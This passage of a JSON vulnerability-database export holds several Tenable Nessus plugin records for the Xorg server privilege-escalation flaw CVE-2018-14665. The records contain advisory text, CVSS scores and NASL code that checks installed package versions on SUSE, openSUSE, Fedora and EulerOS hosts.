script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-debuginfo-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-debugsource-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-extra-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-extra-debuginfo-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-sdk-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"xorg-x11-server-source-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-debuginfo-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-debugsource-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-extra-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-extra-debuginfo-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-sdk-1.19.6-8.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"xorg-x11-server-source-1.19.6-8.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:17:15", "description": "This update for xorg-x11-server fixes the following issues :\n\n - CVE-2018-14665: Disable -logfile and -modulepath when\n running with elevated privileges (bsc#1112020, \n\n Note that SUSE by default does not run with elevated\n privileges, so the default installation is not affected\n by this problem.\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 15, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-19T00:00:00", "title": "openSUSE Security Update : xorg-x11-server (openSUSE-2018-1420)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xorg-x11-server-extra-debuginfo", "p-cpe:/a:novell:opensuse:xorg-x11-server", "p-cpe:/a:novell:opensuse:xorg-x11-server-sdk", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:xorg-x11-server-wayland-debuginfo", "p-cpe:/a:novell:opensuse:xorg-x11-server-source", "p-cpe:/a:novell:opensuse:xorg-x11-server-extra", "p-cpe:/a:novell:opensuse:xorg-x11-server-debugsource", "p-cpe:/a:novell:opensuse:xorg-x11-server-debuginfo", "p-cpe:/a:novell:opensuse:xorg-x11-server-wayland"], "id": "OPENSUSE-2018-1420.NASL", "href": "https://www.tenable.com/plugins/nessus/119025", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1420.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119025);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"openSUSE Security Update : xorg-x11-server (openSUSE-2018-1420)\");\n script_summary(english:\"Check for the openSUSE-2018-1420 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xorg-x11-server fixes the following issues :\n\n - CVE-2018-14665: Disable -logfile and -modulepath when\n running with elevated privileges (bsc#1112020, \n\n Note that SUSE by default does not run with elevated\n privileges, so the default installation is not affected\n by this problem.\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112020\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-wayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-wayland-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-debuginfo-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-debugsource-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-extra-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-extra-debuginfo-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-sdk-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-source-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-wayland-1.19.6-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"xorg-x11-server-wayland-debuginfo-1.19.6-lp150.7.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server / xorg-x11-server-debuginfo / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:17:58", "description": "Fix for CVE-2018-14665\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 15, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 29 : xorg-x11-server (2018-4ab08fedd6)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:xorg-x11-server"], "id": "FEDORA_2018-4AB08FEDD6.NASL", "href": "https://www.tenable.com/plugins/nessus/120398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-4ab08fedd6.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120398);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14665\");\n script_xref(name:\"FEDORA\", value:\"2018-4ab08fedd6\");\n\n script_name(english:\"Fedora 29 : xorg-x11-server (2018-4ab08fedd6)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14665\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-4ab08fedd6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-server package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"xorg-x11-server-1.20.3-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:01:22", "description": "According to the version of the xorg-x11-server packages installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - A flaw was found in xorg-x11-server before 1.20.3. An\n incorrect permission check for -modulepath and -logfile\n options when starting Xorg. X server allows\n unprivileged users with the ability to log in to the\n system via physical console to escalate their\n privileges and run arbitrary code under root\n privileges.(CVE-2018-14665)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 9, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-09T00:00:00", "title": "EulerOS 2.0 SP5 : xorg-x11-server (EulerOS-SA-2019-2553)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2019-12-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:xorg-x11-server-Xephyr", "p-cpe:/a:huawei:euleros:xorg-x11-server-Xorg", "p-cpe:/a:huawei:euleros:xorg-x11-server-Xvfb", "p-cpe:/a:huawei:euleros:xorg-x11-server-common", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2553.NASL", "href": "https://www.tenable.com/plugins/nessus/131827", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131827);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-14665\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : xorg-x11-server (EulerOS-SA-2019-2553)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the xorg-x11-server packages installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - A flaw was found in xorg-x11-server before 1.20.3. An\n incorrect permission check for -modulepath and -logfile\n options when starting Xorg. X server allows\n unprivileged users with the ability to log in to the\n system via physical console to escalate their\n privileges and run arbitrary code under root\n privileges.(CVE-2018-14665)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2553\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a2ce9a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected xorg-x11-server package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID modulepath Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"xorg-x11-server-Xephyr-1.19.5-5.h7.eulerosv2r7\",\n \"xorg-x11-server-Xorg-1.19.5-5.h7.eulerosv2r7\",\n \"xorg-x11-server-Xvfb-1.19.5-5.h7.eulerosv2r7\",\n \"xorg-x11-server-common-1.19.5-5.h7.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
